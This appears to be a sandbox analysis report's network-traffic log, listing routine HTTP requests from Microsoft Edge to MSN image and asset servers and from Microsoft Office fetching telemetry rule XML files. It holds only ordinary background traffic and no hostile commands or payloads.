Source: global traffic HTTP traffic detected: GET /tenant/amp/entityid/BB1msOZ4.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /tenant/amp/entityid/AA13Q6AL.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /tenant/amp/entityid/AAc9vHK.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /tenant/amp/entityid/BB1lFz6G.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /tenant/amp/entityid/AA1hk7Sh.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /tenant/amp/entityid/AA1t99ka.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /c.gif?rnd=1731366386049&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=f29aaf89f12a45dd89a5f5206a84f4ea&activityId=f29aaf89f12a45dd89a5f5206a84f4ea&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=06FBC860557247358032020AD74BA317&MUID=11FAD531813A66492642C0058058675E HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=11FAD531813A66492642C0058058675E; _EDGE_S=F=1&SID=1996236E7A7869AF3367365A7B1A68BD; _EDGE_V=1; SM=T
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_M365_light.png/1.7.32/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /tenant/amp/entityid/BB1msKSh.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /tenant/amp/entityid/BB1msFQB.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /tenant/amp/entityid/BB1msOP1.img HTTP/1.1Host: img-s-msn-com.akamaized.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_outlook_light.png/1.9.10/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic HTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
